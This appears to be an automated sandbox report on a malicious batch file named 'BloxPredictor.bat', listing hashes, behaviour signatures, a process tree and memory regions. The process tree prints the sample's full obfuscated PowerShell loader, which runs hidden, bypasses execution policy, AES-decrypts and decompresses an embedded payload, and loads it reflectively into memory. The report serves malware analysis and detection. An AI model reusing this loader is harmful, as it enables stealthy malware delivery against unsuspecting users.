Analysis
-
max time kernel
116s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
03-09-2022 03:15
General
-
Target
BloxPredictor.bat
-
Size
24KB
-
MD5
2ce736935920d83e5d55570739ca8c17
-
SHA1
9aab2f25403a0fe6921c152f61ed3d2ceacfad49
-
SHA256
001c531b29372d4f6c7697ac00a575773470d23c8681d1d5930aa1e4cd860b76
-
SHA512
c58589dbcf5a23ca2cd9284733db20659b81850a33bc6eddf6379507fb7307a569019373168665fee93c02d42bdd3ee3c42377db7e16405e32f6e7554d8a3de0
-
SSDEEP
768:lsh2CrG0Qz6Ee7Z+x4a7eE8xRrQAh+WVqMJzO:BCrGrGE7x4a7eDfrQAh+SJzO
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 43 IoCs
-
Suspicious use of SendNotifyMessage 45 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe"BloxPredictor.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utPpZ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat').Split([Environment]::NewLine);foreach ($rwqec in $utPpZ) { if ($rwqec.StartsWith(':: ')) { $Wboiv = $rwqec.Substring(3); break; }; };$gxVLe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Wboiv);$GyhDr = New-Object System.Security.Cryptography.AesManaged;$GyhDr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GyhDr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GyhDr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YLrTLbeRJCsrE1rODFNA5EoKHyT/E5XO8ub+oldlmT0=');$GyhDr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WKvnZ2dZQdF2NCy0/rivZA==');$bYWQg = $GyhDr.CreateDecryptor();$gxVLe = $bYWQg.TransformFinalBlock($gxVLe, 0, $gxVLe.Length);$bYWQg.Dispose();$GyhDr.Dispose();$xJivi = New-Object System.IO.MemoryStream(, $gxVLe);$UhQFt = New-Object System.IO.MemoryStream;$RZDSG = New-Object System.IO.Compression.GZipStream($xJivi, [IO.Compression.CompressionMode]::Decompress);$RZDSG.CopyTo($UhQFt);$RZDSG.Dispose();$xJivi.Dispose();$UhQFt.Dispose();$gxVLe = $UhQFt.ToArray();$lwtWe = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($gxVLe);$erSXK = $lwtWe.EntryPoint;$erSXK.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\SndVol.exeSndVol.exe -f 45876373 245631⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/536-54-0x0000000000000000-mapping.dmp
-
memory/868-67-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/868-70-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/868-69-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/868-68-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/916-55-0x0000000000000000-mapping.dmp
-
memory/956-60-0x000007FEF3410000-0x000007FEF3E33000-memory.dmpFilesize
10.1MB
-
memory/956-64-0x00000000024CB000-0x00000000024EA000-memory.dmpFilesize
124KB
-
memory/956-63-0x00000000024C4000-0x00000000024C7000-memory.dmpFilesize
12KB
-
memory/956-61-0x000007FEF28B0000-0x000007FEF340D000-memory.dmpFilesize
11.4MB
-
memory/956-62-0x00000000024C4000-0x00000000024C7000-memory.dmpFilesize
12KB
-
memory/956-59-0x000007FEFB801000-0x000007FEFB803000-memory.dmpFilesize
8KB
-
memory/956-57-0x0000000000000000-mapping.dmp